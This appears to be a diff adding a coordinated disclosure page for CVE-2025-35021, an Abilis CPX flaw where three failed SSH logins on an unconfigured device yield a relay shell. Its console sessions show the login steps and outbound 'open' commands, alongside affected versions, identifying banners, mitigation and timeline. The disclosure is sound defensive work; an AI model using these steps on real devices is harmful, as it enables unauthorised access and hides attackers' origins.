|
| 1 | +--- |
| 2 | +title: CVE-2025-35021 |
| 3 | +aliases: |
| 4 | + - /cves/CVE-2025-35027.html |
| 5 | + - /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |
| 6 | +publishDate: 2025-11-03T18:06:00-06:00 |
| 7 | + |
| 8 | +--- |
| 9 | + |
| 10 | +## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay |
| 11 | + |
| 12 | +[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org. |
| 13 | + |
| 14 | +The [GCVE](https://gcve.eu/about/) identifier for this issue is <span style="white-space: nowrap;">[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]</span> |
| 15 | + |
| 16 | +# Executive Summary |
| 17 | + |
| 18 | +By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*. |
| 19 | + |
| 20 | +# Technical Details |
| 21 | + |
| 22 | +A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device. |
| 23 | + |
| 24 | +In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt. |
| 25 | + |
| 26 | +``` |
| 27 | +$ ssh root@[TARGET] |
| 28 | +root@TARGET's password: |
| 29 | +
|
| 30 | +COM |
| 31 | +
|
| 32 | +Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN |
| 33 | +Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42 |
| 34 | +Login: bad |
| 35 | +
|
| 36 | +PERMISSION DENIED |
| 37 | +
|
| 38 | +Login: bad |
| 39 | +
|
| 40 | +PERMISSION DENIED |
| 41 | +
|
| 42 | +Login: bad |
| 43 | +
|
| 44 | +PERMISSION DENIED |
| 45 | +
|
| 46 | +
|
| 47 | +CLR F0 AE |
| 48 | +
|
| 49 | +[192.168.11.002] SSHS> |
| 50 | +``` |
| 51 | + |
| 52 | +At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell: |
| 53 | + |
| 54 | +``` |
| 55 | +[192.168.11.002]help |
| 56 | +CP Open connection to local CP resource |
| 57 | +SSH Open connection to local SSH client |
| 58 | +TELNET Open connection to local TELNET client |
| 59 | +<CD>-<UD> Open X25 call with CD and UD |
| 60 | +CLR Close connection |
| 61 | +CLOSE Close SSH Session |
| 62 | +EXIT Close SSH Session |
| 63 | +HELP Show current help |
| 64 | +[192.168.11.002] SSHS>SSH |
| 65 | +[192.168.11.002] SSHC> |
| 66 | +[192.168.11.002] SSHC>OPEN 8.8.8.8:53 |
| 67 | +Trying 8.8.8.8:53 ... Open |
| 68 | +
|
| 69 | +Version identification fault |
| 70 | +``` |
| 71 | + |
| 72 | +Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way: |
| 73 | +``` |
| 74 | +[192.168.11.002] SSHS>TELNET |
| 75 | +[192.168.11.002] TELNETC> |
| 76 | +[192.168.11.002]TELNETC>open 1.2.3.4:5678 |
| 77 | +Trying 1.2.3.4:5678 ... Open |
| 78 | +``` |
| 79 | + |
| 80 | +## Affected Products |
| 81 | + |
| 82 | +Affected versions of CPX devices include: |
| 83 | + |
| 84 | +* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48 |
| 85 | +* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10 |
| 86 | +* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 |
| 87 | +* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11 |
| 88 | +* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11 |
| 89 | +* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11 |
| 90 | +* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11 |
| 91 | +* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11 |
| 92 | +* Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0 |
| 93 | + |
| 94 | +Across these devices, affected SSH banners include: |
| 95 | + |
| 96 | +* SSH-1.99-CPX SSH Server |
| 97 | +* SSH-2.0-CPX SSH Server |
| 98 | + |
| 99 | +## Mitigation |
| 100 | + |
| 101 | +According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service. |
| 102 | + |
| 103 | +# Attacker Value |
| 104 | + |
| 105 | +By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets. |
| 106 | + |
| 107 | +# Credit |
| 108 | + |
| 109 | +This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA. |
| 110 | + |
| 111 | +# Timeline |
| 112 | + |
| 113 | +* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble] |
| 114 | +* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it |
| 115 | +* 2025-08-20 (Wed): Provided technical details to the vendor |
| 116 | +* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue |
| 117 | +* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7) |
| 118 | +* 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and [CVE-2025-35021] reserved |
| 119 | +* 2025-11-03 (Mon): This public disclosure |
| 120 | + |
| 121 | +---- |
| 122 | + |
| 123 | +[AHA!]: https://takeonme.org |
| 124 | +[disclosure policy]: https://takeonme.org/cve.html |
| 125 | +[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021 |
| 126 | +[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc |
| 127 | +[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8 |
| 128 | +[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/ |
| 129 | +[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |
0 commit comments